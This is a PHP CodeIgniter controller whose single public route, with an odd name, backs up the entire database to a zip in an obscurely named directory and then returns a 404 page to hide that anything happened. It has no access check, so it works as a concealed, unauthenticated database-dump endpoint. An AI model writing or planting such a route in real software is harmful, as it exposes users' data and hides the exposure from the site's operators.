<?php
defined('BASEPATH') OR exit('No direct script access allowed');
class App extends CI_Controller {

	public function __construct()
	{
		parent::__construct();
        $this->load->helper('download');
	}

	public function kawaidastuff(){
		$this->load->dbutil();

		$prefs = array(     
			'format'      => 'zip',             
			'filename'    => 'my_db_backup.sql'
		);

		$backup = $this->dbutil->backup($prefs); 
		$db_name = 'backup-'. date("Y-m-d") .'.zip';
		$save = './_flbakups98mzw/' .$db_name;
		
		$this->load->helper('file');
		write_file($save, $backup); 
		show_404();
	}

}
